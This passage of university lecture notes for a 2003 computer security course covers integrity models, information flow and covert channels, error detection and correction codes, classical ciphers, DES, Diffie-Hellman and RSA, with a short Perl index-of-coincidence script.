BLP is a static model, not providing techniques for changingaccess rights or security levels4, and there is an explorationand discussion into the limitations of this sort of securitymodelling in section 5.4 of the textbook.
However the model does demonstrate initial ideas into howto model, and how to build security systems that are prov-ably secure.
4You might want to explore the Harrison-Ruzo-Ullman model for this capability.
CS3235 - Hugh Anderson’s notes. Page number: 254
Biba model, integrity
Trustworthiness of data and programs - assurance forintegrity services.
Levels like clean or dirty (in reference to database en-tries).
Biba model (chapter 6.2) is a kind of dual for Bell-LaPadula. integrity vs confidentiality.
CS3235 - Hugh Anderson’s notes. Page number: 255
Biba levels
The integrity levels I are ordered as for the security lev-els
Function i : O → I (i : S → I) which returns the integritylevel of an object (subject).
CS3235 - Hugh Anderson’s notes. Page number: 256
Biba properties
The properties/rules for the main (static) Biba model are:
• No read-down : s can read o iff i(s) ≤ i(o).
• No write-up : s can write o iff i(o) ≤ i(s).
• No invoke-up : s1 can execute s2 iff i(s2) ≤ i(s1).
CS3235 - Hugh Anderson’s notes. Page number: 257
Biba - dynamic
Biba models can also handle dynamic integrity levels, wherethe level of a subject reduces if it accesses an object ata lower level (in other words it has got dirty). The low-watermark policies are:
• No write-up : s can write o iff i(o) ≤ i(s).
• Subject lowers : if s reads o then i′(s) = min(i(s), i(o)).
• No invoke-up : s1 can execute s2 iff i(s2) ≤ i(s1).
CS3235 - Hugh Anderson’s notes. Page number: 258
Biba - ring
Finally, we have a ring policy,
• All read : s can read o regardless.
• No write-up : s can write o if and only if i(o) ≤ i(s).
• No invoke-up : s1 can execute s2 if and only if i(s2) ≤i(s1).
Each of these policies have an application in some area. -Example in textbook, p155 (LOCUS OS)
CS3235 - Hugh Anderson’s notes. Page number: 259
Clark-Wilson, integrity
Transactions defined through certification rules.
The Clark-Wilson model has the following terminology:
Term Definition
CDI Constrained Data Item (data subject to control)
UDI UnconstrainedData Item (data not subject to control)
IVP Integrity Verification Procedures (for testing correct CDIs)
TP Transformation Procedures (for transforming the system)
CS3235 - Hugh Anderson’s notes. Page number: 260
Chapter 6
Lecture 6 - Errors
CS3235 - Hugh Anderson’s notes. Page number: 261
Assignment 1
Form your groups,
Select your project,
Email me with your proposal for approval
CS3235 - Hugh Anderson’s notes. Page number: 262
Assignment 1
Literature review - not a survey :(
Formal paper - format in either word.zip, latex2e.zip inhttp://www.comp.nus.edu.sg/˜cs3235/2003-semesterI/
Heading, Author(s), abstract (?), Introduction, body ofpaper, Summary/Conclusion, References
10-50 pages, 5-50 references
CS3235 - Hugh Anderson’s notes. Page number: 263
Assignment 2
More detailed, in-depth study
Not necessarily a software development project
Comparison, research, idea, program
CS3235 - Hugh Anderson’s notes. Page number: 264
Mid semester Test
9th October 2003
LT27, 14:30
MCQ, closed book
Covers everything up to the lecture before...
CS3235 - Hugh Anderson’s notes. Page number: 265
Last session
• Channel properties
• Entropy
• Models
CS3235 - Hugh Anderson’s notes. Page number: 266
This session
• Information flow
• Simple error detection
• Simple error correction
• Encryption
CS3235 - Hugh Anderson’s notes. Page number: 267
Information flow (Chapter 16)
We may also more abstractly model some security poli-cies by considering the flow of information in a system.
We can use entropy to formalize this.
In this context, we can establish quantitative resultsabout information flow in a system, rather than just mak-ing absolute assertions5.
5For example, “System X reveals no more than 25% of the input values”.
CS3235 - Hugh Anderson’s notes. Page number: 268
Information flow
In the textbook we have a definition of information flowbased on the conditional entropy H(x | y) of some x giveny:
Definition 16-1. The command sequence c causes a flowof information from x to y′ if H(x | y′) < H(x | y). If ydoes not exist in s then H(x | y) = H(x).
We can use this to detect implicit flows of information, notjust explicit ones in which we directly modify an object.
CS3235 - Hugh Anderson’s notes. Page number: 269
Information flow
Consider the example on page 409 of the textbook:
if x=1 theny := 0
elsey := 1;
After this code segment, we can determine if x = 1 fromy′ even though we do not ever assign y′ directly from somefunction of x. In other words we have an implicit flow ofinformation from x to y′.
CS3235 - Hugh Anderson’s notes. Page number: 270
Information flow
Formal treatment by considering the entropy of x. If thelikelihood of x = 1 is 0.5, then H(x) = 1. We can alsodeduce that H(x | y′) = 0, and so
H(x | y′) < H(x | y) = H(x) = 1
and information is flowing from x to y′. Paper gives somebackground.
CS3235 - Hugh Anderson’s notes. Page number: 271
Confinement and covert channels
The confinement problem is one of preventing a systemfrom leaking (possibly partial) information.
Sometimes a system can have an unexpected path of trans-mission of data, termed a covert channel, and through theuse of this covert channel information may be leaked eitherby a malicious program, or by accident.
CS3235 - Hugh Anderson’s notes. Page number: 272
Confinement and covert channels
Consider the set of permissions on a file.
An unscrupulous program could modify these permissionscyclically to transmit a very-low data-rate message to an-other unscrupulous program.
CS3235 - Hugh Anderson’s notes. Page number: 273
Confinement and covert channels
We categorize covert channels into two:
1. Storage channels: using the presence or absence ofobjects
2. Timing channels: the speed of events
We can attempt to identify covert channels by building ashared resource matrix, determining which processes canread and write which resources.
CS3235 - Hugh Anderson’s notes. Page number: 274
Attacks on databases
Governing body may keep secret individual information,but release cumulative information
For example: Today’s average temperature of SOC staffby nationality:
Singaporean Malaysian PRC Poland German Australian New Zealand ....
36.8 36.7 36.9 37.1 36.5 38.2 38.1 ....
CS3235 - Hugh Anderson’s notes. Page number: 275
Attacks on databases
OK - doesn’t release any sensitive information, but
what if another part of the database released the num-bers of SOC staff by nationality...
Singaporean Malaysian PRC Poland German Australian New Zealand ....
23 12 14 3 5 4 1 ....
By inference you can deduce that the temperature of aparticular individual is too high!
CS3235 - Hugh Anderson’s notes. Page number: 276
This session
• Information flow
• Simple error detection
• Simple error correction
• Encryption
CS3235 - Hugh Anderson’s notes. Page number: 277
Simple check codes
Transmit data:
1 65 3 22 47 2
Transmit data+checksum:
1 65 3 22 47 2 140
CS3235 - Hugh Anderson’s notes. Page number: 278
One-way parity
A 0 1 0 0 0 0 0 10 0 0 1 1 0 0 0 0D 0 1 0 0 0 1 0 0B 0 1 0 0 0 0 1 0B 0 1 0 0 0 0 1 0C 0 1 0 0 0 0 1 1
Check: 0 1 1 1 0 1 1 0
CS3235 - Hugh Anderson’s notes. Page number: 279
Two way parity
A 0 1 0 0 0 0 0 1 00 0 0 1 1 0 0 0 0 0D 0 1 0 0 0 1 0 0 0B 0 1 0 0 0 0 1 0 0B 0 1 0 0 0 0 1 0 0C 0 1 0 0 0 0 1 1 1
Check: 0 1 1 1 0 1 1 0 X
CS3235 - Hugh Anderson’s notes. Page number: 280
Simple check codes
Parity of bits - detects all 1 bit errors, but...
Horizontal and vertical parity - better, but problems withrepetitive errors
Sum of values - problems with repetitive errors
Want better level of error checking
CS3235 - Hugh Anderson’s notes. Page number: 281
Cyclic redundancy check codes
Treat the stream of transmitted bits as a representation of apolynomial with coefficients of 1:
10110 = x4 + x2 + x1 = F (x)
Checksum bits are added to ensure that the final compositestream of bits is divisible by some other polynomial g(x).
CS3235 - Hugh Anderson’s notes. Page number: 282
Cyclic redundancy check codes
We can transform any stream F (x) into a stream T (x)which is divisible by g(x).
If there are errors in T (x), they take the form of a dif-ference bit string E(x) and the final received bits areT (x) + E(x).
When the receiver gets a correct stream, it divides it byg(x) and gets no remainder.
CS3235 - Hugh Anderson’s notes. Page number: 283
Cyclic redundancy check codes
The question is: How likely is that T (x) + E(x) will alsodivide with no remainder?
Single bits? - No a single bit error means that E(x)will have only one term (x1285 say). If the generatorpolynomial has xn + ... + 1 it will never divide evenly.
Multiple bits? - Various generator polynomials areused with different properties. Must have one factor ofthe polynomial being x1 + 1, because this ensures allodd numbers of bit errors (1,3,5,7...).
CS3235 - Hugh Anderson’s notes. Page number: 284
Some common generators:
• CRC-12 - x12 + x11 + x3 + x2 + x1 + 1
• CRC-16 - x16 + x15 + x2 + 1
• CRC-32 - x32+x26+x23+x22+x16+x12+x11+x10+x8+x7+x5+x4+x2+1
• CRC-CCITT - x16 + x12 + x5 + 1
CS3235 - Hugh Anderson’s notes. Page number: 285
Long division is easy!
Generator g(x): x5 + x2 + 1 (100101) and F (x): 101101011.
divide F (x) by g(x), and the remainder is appended to F (x)to give T (x):
1010.01000100101 )101101011.00000
100101100001100101
1001.001001.01
1000
T (x) = 10110101101000.
CS3235 - Hugh Anderson’s notes. Page number: 286
Long division is easy!
When this stream is received, it is divided but now will haveno remainder if the stream is received without errors.
QD
C
S/RQD
C
S/R QD
C
S/RQD
C
S/RQD
C
S/R
Data
Clock
XORXOR
D1D0 D2 D3 D4
CS3235 - Hugh Anderson’s notes. Page number: 287
Long division is easy!
Input data D4 D3 D2 D1 D0 Note
... 0 0 0 0 0 Initial state
1 0 0 0 0 1 First bit
0 0 0 0 1 0 Second bit
1 0 0 1 0 1 Third bit
1 0 1 0 1 1
0 1 0 1 1 0
1 0 1 0 0 0
0 1 0 0 0 0
1 0 0 1 0 0
...
CS3235 - Hugh Anderson’s notes. Page number: 288
Long division is easy!
Input data D4 D3 D2 D1 D0 Note
...
1 0 1 0 0 1
0 1 0 0 1 0
0 0 0 0 0 1
0 0 0 0 1 0
0 0 0 1 0 0
0 0 1 0 0 0
CS3235 - Hugh Anderson’s notes. Page number: 289
Case study: ethernet
Ethernet is used for networking computers, principally be-cause of its speed and low cost. The maximum size of anethernet frame is 1514 bytes6, and a 32-bit FCS is calcu-lated over the full length of the frame.
The FCS used is:
• CRC-32 - x32+x26+x23+x22+x16+x12+x11+x10+x8+x7+x5+x4+x2+1
61500 bytes of data, a source and destination address each of six bytes, and a twobyte type identifier. The frame also has a synchronizing header and trailer which is notchecked by a CRC.
CS3235 - Hugh Anderson’s notes. Page number: 290
This session
• Information flow
• Simple error detection
• Simple error correction
• Encryption
CS3235 - Hugh Anderson’s notes. Page number: 291
Simple error correction
Methods used to correct errors:
• Ignore errors, while acknowledging correct data. ARQ(for Automatic Repeat reQuest).
• Error correcting codes (for computer memory)
CS3235 - Hugh Anderson’s notes. Page number: 292
Code types
We can divide error correcting codes (ECC) into continu-ous and block-based types. Convolutional encodings areused for continuous systems, and the common block-basedcodes are:
• Hamming codes (for correcting single bit errors),
• Golay codes (for correcting up to three bit errors), and
• Bose-Chaudhuri-Hocquenghem (BCH ) codes (for cor-recting block errors).
CS3235 - Hugh Anderson’s notes. Page number: 293
Combining error correcting codes
Different types of error correcting codes can be com-bined to produce composite codes.
For example, Reed-Solomon block-codes are often com-bined with convolutional codes to improve all-round per-formance.
In this combined setup, the convolutional code correctsrandomly distributed bit errors but not bursts of errorswhile the Reed-Solomon code corrects the burst errors.
CS3235 - Hugh Anderson’s notes. Page number: 294
Accepting bad data
Sometimes we are willing to accept bad data...
CS3235 - Hugh Anderson’s notes. Page number: 295
BER and noise
System Error rate (errors/bit)
Wiring of internal circuits 10−15
Memory chips 10−14
Hard disk 10−9
Optical drives 10−8
Coaxial cable 10−6
Optical disk (CD) 10−5
Telephone System 10−4
CS3235 - Hugh Anderson’s notes. Page number: 296
BER and noise
We can determine the theoretical channel capacity knowingthe SNR:
• BER is 0.01, channel capacity C ' 0.92 bits/symbol.
• BER is 0.001, channel capacity C ' 0.99 bits/symbol.
• BER is 0, channel capacity C = 1 bits/symbol.
The theoretical maximum channel capacity is quite close tothe perfect channel capacity, even if the BER is high.
CS3235 - Hugh Anderson’s notes. Page number: 297
Reducing BER
Increase the signal (power), or
Reduce the noise (often not possible), or
Use ECC.
The benefit of error correcting codes is that they can im-prove the received BER without increasing the transmittedpower. This performance improvement is measured as asystem gain .
CS3235 - Hugh Anderson’s notes. Page number: 298
Reducing BER
Example: Consider a system without ECC giving a BER of0.001 with a S/N ratio of 30dB (1000:1). If we were to usean ECC codec, we might get the same BER of 0.001 witha S/N ratio of 20dB (100:1). We say that the system gaindue to ECC is 10dB (10:1).
CS3235 - Hugh Anderson’s notes. Page number: 299
Bad ECC scheme: repetition
An initial scheme to correct transmission errors might be tojust repeat bits7.
Data: 0 1 0 0 1 1 1 1 ...Transmit: 000111000000111111111111...
If we send three identical bits for every bit we wish to trans-mit, we can then use a voting system to determine the mostlikely bit. If our natural BER due to noise was 0.01, with threebits we would achieve a synthetic BER of 0.0001, but ourchannel capacity is reduced to about C = 0.31 bits/symbol.
7Note: there is no point in repeating bits twice. you must repeat three times, or 5times, and then vote to decide the best value.
CS3235 - Hugh Anderson’s notes. Page number: 300
Bad ECC scheme: repetition
We can see from this that the rate of transmission us-ing repetition has to approach zero to achieve more andmore reliable transmission.
However we know that the theoretical rate should beequal to or just below the channel capacity C.
Convolutional and other encodings can achieve rates oftransmission close to the theoretical maximum.
CS3235 - Hugh Anderson’s notes. Page number: 301
ECC scheme: Hamming
Hamming codes are block-based error correcting codes.
We add hamming bits to a string
Here we derive the inequality used to determine howmany extra hamming bits are needed for an arbitrary bitstring.
CS3235 - Hugh Anderson’s notes. Page number: 302
ECC scheme: Hamming
The hamming distance is a measure of how FAR apart twobit strings are.
A: 0 1 0 1 1 1 0 0 0 1 1 1B: 0 1 1 1 1 1 1 0 0 1 0 1A XOR B: 0 0 1 0 0 0 1 0 0 0 1 0
CS3235 - Hugh Anderson’s notes. Page number: 303
ECC scheme: Hamming
If we had two bit strings X and Y representing two char-acters, and the hamming distance between any two codeswas d, we could turn X into Y with d single bit errors.
• If we had an encoding scheme (for say ASCII characters)and the minimum hamming distance between any twocodes was d + 1, we could detect d single bit errors8.
• We can correct up to d single bit errors in an encodingscheme if the minimum hamming distance is 2d + 1.
8Because the code d bits away from a correct code is not in the encoding.
CS3235 - Hugh Anderson’s notes. Page number: 304
ECC scheme: Hamming
If we now encode m bits using r extra hamming bits to makea total of n = m + r , we can count how many correct andincorrect hamming encodings we should have. With m bitswe have 2m unique messages - each with n illegal encod-ings, and:
(n + 1)2m ≤ 2n
(m + r + 1)2m ≤ 2n
m + r + 1 ≤ 2n−m
m + r + 1 ≤ 2r
CS3235 - Hugh Anderson’s notes. Page number: 305
ECC scheme: Hamming
We solve this inequality, and then choose R, the next integerlarger than r.
Example: If we wanted to encode 8 bit values (m = 8) andbe able to recognise single bit errors:
8 + r + 1 ≤ 2r
9 ≤ 2r − r
r ' 3.5
R = 4
CS3235 - Hugh Anderson’s notes. Page number: 306
Reed-Solomon codes
Reed-Solomon codes are block-based error correctingcodes which are particularly good at correcting bursts(sequences) of bit errors.
They are found in a wide range of digital communicationsand storage applications.
Reed-Solomon codes are used to correct errors in digitalwireless applications such as wireless LAN systems, andlow Earth orbit (LEO) satellite communication systems.
CS3235 - Hugh Anderson’s notes. Page number: 307
Reed-Solomon codes
A Reed-Solomon code is specified as
• RS(n,k) with s-bit symbols.
This means that the encoder takes k data symbols of s bitseach and adds parity symbols to make an n symbol Thereare n− k parity symbols of s bits each.A Reed-Solomon decoder can correct up to t symbols thatcontain errors in a codeword, where
2t = n− k
CS3235 - Hugh Anderson’s notes. Page number: 308
Reed-Solomon code
Example: A popular Reed-Solomon code is RS(255,223)with 8-bit symbols. Each codeword contains 255 code wordbytes, of which 223 bytes are data and 32 bytes are parity.In this example, n = 255, k = 223, and s = 8.
2t = 32
and so t = 16
The Reed-Solomon decoder in this example can correct any16 symbol errors in the codeword.
CS3235 - Hugh Anderson’s notes. Page number: 309
Chapter 7
Lecture 7 - Encryption
CS3235 - Hugh Anderson’s notes. Page number: 310
Mid semester Test
9th October 2003
LT27, 14:30
MCQ, closed book
Covers everything up to the lecture before...
CS3235 - Hugh Anderson’s notes. Page number: 311
Last session
• Information flow
• Simple error detection
• Simple error correction
CS3235 - Hugh Anderson’s notes. Page number: 312
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 313
Key points from last week
Error detection vs Error correction
Mathematical analysis
Error rate, noise, channel capacity
Theoretical vs actual channel capacity
CS3235 - Hugh Anderson’s notes. Page number: 314
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 315
Convolutional codes
Convolutional codes operate continuously and so are es-pecially useful in data transmission systems.
The convolutional encoder operates on a continuousstream of data using a shift-register to produce a con-tinuous encoded output stream.
CS3235 - Hugh Anderson’s notes. Page number: 316
Convolutional codes
QD
C
S/RData In
Data OutS/R
C
D QDQS/R
C
Received bit sequence can be examined for the most likelycorrect output sequence
CS3235 - Hugh Anderson’s notes. Page number: 317
Trellis diagram
000000
00
00
11 11111111
00
B
A
D
00000000
C
11
1010
01 01
101001 010101
01
10
11
11 11 11
10
01 01
101010
CS3235 - Hugh Anderson’s notes. Page number: 318
Most likely path
If we were to input the sequence 011010, we would get thefollowing trace through the trellis, with the bit sequence out-put as 001110110101:
D
B
A
C
10 0101111100
CS3235 - Hugh Anderson’s notes. Page number: 319
Convolutional codes
Determine the most likely path, even with large numbersof bit errors.
A convolutional encoding can often reduce errors by afactor of 102 to 103.
CS3235 - Hugh Anderson’s notes. Page number: 320
Viterbi decoding
The Viterbi algorithm tries to find the most likely re-ceived data sequence, by keeping track of the four mostlikely paths through the trellis.
For each path, a running count of the hamming distancebetween the received sequence and the path is main-tained.
The most likely received string is the one with the lowesthamming distance.
CS3235 - Hugh Anderson’s notes. Page number: 321
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 322
Encryption and authentication
Security and Cryptographic systems act to reduce failure ofsystems due to the following threats:
Interruption - attacking the availability of a service (Denialof Service).
Interception - attacks confidentiality.
Modification - attacks integrity.
Fabrication - attacks authenticity. Note that you may notneed to decode a signal to fabricate it - you might justrecord and replay it.
CS3235 - Hugh Anderson’s notes. Page number: 323
Encoding and deciphering
I could have told her the truth - that the same cal-culation which had served me for deciphering themanuscript had enabled me to learn the word - but ona caprice it struck me to tell her that a genie had re-vealed it to me. This false disclosure fettered Madamed’Urfé to me. That day I became the master of hersoul, and I abused my power.
We call these systems symmetric key systems...
CS3235 - Hugh Anderson’s notes. Page number: 324
Symmetric key systems
XPKi[P]P
X(Plaintext)(Plaintext)
KiKi
CS3235 - Hugh Anderson’s notes. Page number: 325
Simple ciphers - transposition
Transposition ciphers just re-order the letters of the originalmessage. This is known as an anagram:
• parliament is an anagram of partial men
• Eleven plus two is an anagram of Twelve plus one
Perhaps you would like to see if you can unscramble “ageprison”, or “try open”.
CS3235 - Hugh Anderson’s notes. Page number: 326
Transposition
Detect a transposition cipher with the frequencies of theletters, and letter pairs.
If the frequency of single letters in ciphertext is correct,but the frequencies of letter pairs is wrong, then the ci-pher may be a transposition.
This sort of analysis can also assist in unscrambling atransposition ciphertext, by arranging the letters in theirletter pairs.
CS3235 - Hugh Anderson’s notes. Page number: 327
Simple ciphers - substitution
Substitution cipher systems encode the input stream us-ing a substitution rule.
The Cæsar cipher is an example of a simple substi-tution cipher system, but it can be cracked in at most25 attempts by just trying each of the 25 values in thekeyspace.
CS3235 - Hugh Anderson’s notes. Page number: 328
Substitution
Code Encoding
A Q
B V
C X
D W
... ...
If the mapping was more randomly chosen it iscalled a monoalphabetic substitution cipher, and thekeyspace for encoding 26 letters would be 26! − 1 =403, 291, 461, 126, 605, 635, 583, 999, 999.
CS3235 - Hugh Anderson’s notes. Page number: 329
Substitution
If we could decrypt 1, 000, 000 messages in a second,then the average time to find a solution would be about6, 394, 144, 170, 576 years!
We might be lulled into a sense of security by these bignumbers, but of course this sort of cipher can be subjectto frequency analysis.
CS3235 - Hugh Anderson’s notes. Page number: 330
Frequency analysis
In the English language, the most common letters are: "E TA O N I S H R D L U..." (from most to least common), andwe may use the frequency of the encrypted data to makegood guesses at the original plaintext.
We may also look for digrams and trigrams (th, the).
CS3235 - Hugh Anderson’s notes. Page number: 331
Vigenère
The Vigenère cipher is a polyalphabetic substitution ci-pher invented around 1520.
We use an encoding/decoding sheet, called a tableau,and a keyword or key sequence.
CS3235 - Hugh Anderson’s notes. Page number: 332
Vigenère
A B C D E F G H ...
A A B C D E F G H ...
B B C D E F G H I ...
C C D E F G H I J ...
D D E F G H I J K ...
E E F G H I J K L ...
F F G H I J K L M ...
G G H I J K L M N ...
H H I J K L M N O ...
... ... ... ... ... ... ... ... ... ...
CS3235 - Hugh Anderson’s notes. Page number: 333
Vigenère
If our keyword was BAD, then encoding HAD A FEED wouldresult in
Key B A D B A D B A
Text H A D A F E E D
Cipher I A G B F H F D
If we can discover the length of the repeated key (in thiscase 3), and the text is long enough, we can just considerthe cipher text to be a group of interleaved monoalphabeticsubstitution ciphers and solve accordingly.
CS3235 - Hugh Anderson’s notes. Page number: 334
Analysis
The index of coincidence is the probability that two randomlychosen letters from the cipher will be the same, and it canhelp us discover the length of a key
IC =1
N(N − 1)
25∑
i=0
Fi(Fi − 1)
where Fi is the frequency of the occurences of symbol i andN is the length of the cipher.
CS3235 - Hugh Anderson’s notes. Page number: 335
Index of coincidence
#!/usr/bin/perl$skip=$ARGV[0] ;@text=<stdin> ;$all=join(”,@text) ;$all =~ tr/a-z/A-Z/ ;$all =~ tr/A-Z//cd ;$header=substr($all,0,$skip) ;$shifted = substr($all,$skip).$header ;@alltxt=split(//,$all) ; @shiftxt=split(//,$shifted) ;foreach $i(0..$#alltxt)
if($alltxt[$i] eq $shiftxt[$i]) $count++ ;printf("Index of Coincidence is: %2f\n",$count/$#alltxt) ;
Show analysis using shifts of 1...2...3...
CS3235 - Hugh Anderson’s notes. Page number: 336
Index of coincidence
The ideas here were developed by William F. Friedmanin his Ph.D.
Friedman also coined the words “cryptanalysis” and“cryptology”.
Friedman worked on the solution of German code sys-tems during the first (1914-1918) world war, and later be-came a world-renowned cryptologist.
CS3235 - Hugh Anderson’s notes. Page number: 337
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 338
S-box
4:22:4 Permutation
(3,4,2,1)
CS3235 - Hugh Anderson’s notes. Page number: 339
S-boxes and P-boxes
The S-box (Substitution-Box) is a hardware device whichencodes n bit numbers to other n bit numbers and canbe represented by a permutation.
A P-box is just a simple permutation box.
If you use an S-box and a P-box at once, you have aproduct cipher which is generally harder to decode.
CS3235 - Hugh Anderson’s notes. Page number: 340
DES - Data Encryption Standard
DES was first proposed by IBM using 128 bit keys, butits security was reduced by NSA (the National SecurityAgency) to a 56 bit key.
At 1ms/GUESS. It would take 1080 years to solve 128 bitkey encryption.
The DES Standard gave a business level of safety, andis a product cipher.
CS3235 - Hugh Anderson’s notes. Page number: 341
DES - Data Encryption Standard
The (shared) 56 bit key is used to generate 16 subkeys,which each control a sequenced P-box or S-box stage.
DES works on 64 bit messages called blocks.
If you intercept the key, you can decode the message.
However, there are about 1017 keys.
CS3235 - Hugh Anderson’s notes. Page number: 342
Feistel
+ f
+ f
+ f
+ f
+ f
+ f
K2
K1
K0
K1
K0
K2
l0 r0
l0 r0
l1 r1
l2 r2
l3 r3
l3 r3
l2 r2
l1 r1
Each of the 16 stages (rounds) of DES uses a Feistel struc-ture which encrypts a 64 bit value into another 64 bit valueusing a 48 bit key derived from the original 56 bit key.
CS3235 - Hugh Anderson’s notes. Page number: 343
DES modes of operation
The US government specifically recommends not usingthe weakest simplest mode for messages, the ElectronicCodebook (ECB) mode.
They recommend the stronger and more complex CipherFeedback (CFB) or Cipher Block Chaining (CBC) modes.
The CBC mode XORs the next 64-bit block with the resultof the previous 64-bit encryption, and is more difficult toattack.
CS3235 - Hugh Anderson’s notes. Page number: 344
DES modes of operation
DES
Ctext
msg
Electronic Code Book
DES
Ctext
msg
DES
Ctext
msg
Cipher Block Chaining
Initial vector
CS3235 - Hugh Anderson’s notes. Page number: 345
DES software
DES is available as a library on both UNIX and Microsoft-based systems. There is typically a des.h file, which mustbe included in any C source using the DES library:
#include “des.h”//// - Your calls
CS3235 - Hugh Anderson’s notes. Page number: 346
DES software
After initialization of the DES engine, the library provides asystem call which can both encrypt and decrypt:
int des cbc encrypt(clear, cipher, schedule, encrypt)
where the encrypt parameter determines if we are to enci-pher or decipher.
The schedule contains the secret DES key.
CS3235 - Hugh Anderson’s notes. Page number: 347
Case study: Amoeba capabilities
All Amoeba objects are identified by a capability stringwhich is encrypted using DES encryption. A capability islong enough so that you can’t just make them up.
If you have the string, you have whatever the capabilityallows you. If you want to give someone some access toa file, you can give them the capability string. They placethis in their directory, and can see the file.
CS3235 - Hugh Anderson’s notes. Page number: 348
Case study: Amoeba capabilities
object
identify the objectthe server uses to
Internal number which
Identifies whichoperations are
(48 bits) (24 bits) (8 bits) (48 bits)
Protects against forging
allowedwhich manages the Identifies the server
CheckfieldRightsObject IDServer Port
To further prevent tampering, the capability is DES en-crypted. The resultant bit stream may be used directly, orconverted to and from an ASCII string with the a2c and c2acommands.
CS3235 - Hugh Anderson’s notes. Page number: 349
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 350
Public key systems
In 1976 Diffie and Hellman published the paper “New Di-rections in Cryptography”, which first introduced the ideaof public key cryptography.
Public key cryptography relies on the use of encipheringfunctions which are not realistically invertible unless youhave a deciphering key.
For example, we have the discrete logarithm problem inwhich it is relatively easy to calculate n = gk mod p giveng, k and p, but difficult to calculate k in the same equation,given g, n and p.
CS3235 - Hugh Anderson’s notes. Page number: 351
Diffie-Hellman key agreement
Two separated users create and share a secret key. A thirdparty is not realistically able to calculate the shared key.
g mod p
p,g
ba
p,g,a
b
Ted
BobAlicep,g,b
ag mod p
g mod pg mod p
bg mod pag mod p
CS3235 - Hugh Anderson’s notes. Page number: 352
Knowledge different
• All participants know two system parameters p, and g
• Alice and Bob each have a secret value (Alice has a andBob has b)
• Alice and Bob each calculate and exchange a public key(ga mod p for Alice and gb mod p for Bob).
• Ted knows g, p, ga mod p and gb mod p, but not a or b.
CS3235 - Hugh Anderson’s notes. Page number: 353
Diffie-Hellman key agreement
Both Alice and Bob can now calculate the value gab mod p.
1. Alice calculates (gb mod p)a mod p = (gb)a mod p.
2. Bob calculates (ga mod p)b mod p = (ga)b mod p.
And of course (gb)a mod p = (ga)b mod p = gab mod pwhich is the shared key.
CS3235 - Hugh Anderson’s notes. Page number: 354
Diffie-Hellman key agreement
Ted has a much more difficult problem. It is difficult to cal-culate gab mod p without knowing either a or b. The algo-rithmic run-time of the (so-far best) algorithm for doing thisis in
O(ec√
r log r)
where c is small, but ≥ 1, and r is the number of bits in thenumber.
CS3235 - Hugh Anderson’s notes. Page number: 355
Diffie-Hellman key agreement
By contrast, the enciphering and deciphering process maybe done in O(r):
Bit size Enciphering Discrete logarithm solution
10 10 23
100 100 1,386,282
1,000 1,000 612,700,000,000,000,000,000,000
CS3235 - Hugh Anderson’s notes. Page number: 356
Encryption
(Plaintext)XX
P
K1 (K1[K2[P]]=P)and also(K2[K1[P]]=P)
K1[P]
K2
P
CS3235 - Hugh Anderson’s notes. Page number: 357
Authentication
K2
XP
K1
PK1[J2[P]]
J1J2
XXX
CS3235 - Hugh Anderson’s notes. Page number: 358
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 359
RSA (Rivest, Shamir, Adelman)
This public key system relies on the difficult problem of try-ing to find the complete factorization of a large composite9
integer whose prime factors10 are not known.
9An integer larger than 1 is called composite if it has at least one divisor larger than1.
10The Fundamental Theorem of Arithmetic states that any integer N (greater than0) may be expressed uniquely as the product of prime numbers.
CS3235 - Hugh Anderson’s notes. Page number: 360
RSA hacks
Two RSA-encrypted messages have been cracked:
• The inventors of RSA published a 129-digits (430 bits)RSA public key. In 1994, it was factored with 5000 MIPS-years of computing time.
• A year later, a 384-bit PGP key was cracked. It needed1300 MIPS-years to factor the key in three months.
Note that these efforts each only cracked a single RSA key.
CS3235 - Hugh Anderson’s notes. Page number: 361
RSA hacks
If you happen to be able to factor the following number,please tell Hugh - we can split US$200,00011!
25195908475657893494027183240048398571429282126204032027777137836043662020707595556264018525880784406918290641249515082189298559149176184502808489120072844992687392807287776735971418347270261896375014971824691165077613379859095700097330459748808428401797429100642458691817195118746121515172654632282216869987549182422433637259085141865462043576798423387184774447920739934236584823824281198163815010674810451660377306056201619676256133844143603833904414952634432190114657544454178424020924616515723350778707749817125772467962926386356373289912154831438167899885040445364023527381951378636564391212010397122822120720357
11US$150,000 for me, US$50,000 for you...
CS3235 - Hugh Anderson’s notes. Page number: 362
RSA coding algorithms
Below are outlined the four processes needed for RSA en-cryption:
1. Creating a public key
2. Creating a secret key
3. Encrypting messages
4. Decoding messages
CS3235 - Hugh Anderson’s notes. Page number: 363
To create public key Kp
1. Select two different large primes P and Q.
2. Assign x = (P − 1)(Q− 1). (Does this ring a bell?)
3. Choose E relative prime to x. (This must satisfy conditionfor Ks given later)
4. Assign N = P ∗Q.
5. Kp is N concatenated with E.
CS3235 - Hugh Anderson’s notes. Page number: 364
To create private (secret) key Ks
1. Choose D: D ∗ E mod x = 1.
(a) (i.e. multiplicative inverses)(b) another way: DE = k(P − 1)(Q− 1) + 1
2. Ks is N concatenated with D.
CS3235 - Hugh Anderson’s notes. Page number: 365
To encode plain text m
1. Pretend m is a number.
2. Calculate c = mE mod N .
CS3235 - Hugh Anderson’s notes. Page number: 366
To decode c back to m
1. Calculate m = cD mod N .
2. ....WHY?....
CS3235 - Hugh Anderson’s notes. Page number: 367
...Why?...
cD mod N = m
ED mod N
= mk(P−1)(Q−1)+1 mod PQ
= m ∗mk(P−1)(Q−1) modPQ
• mP−1 mod P = 1, so (m(P−1))k(Q−1) modP = 1
• mQ−1 mod Q = 1, and so (tutorial) (m(P−1))k(Q−1) modPQ = 1.
cD mod N = m
ED mod N
CS3235 - Hugh Anderson’s notes. Page number: 368
RSA code
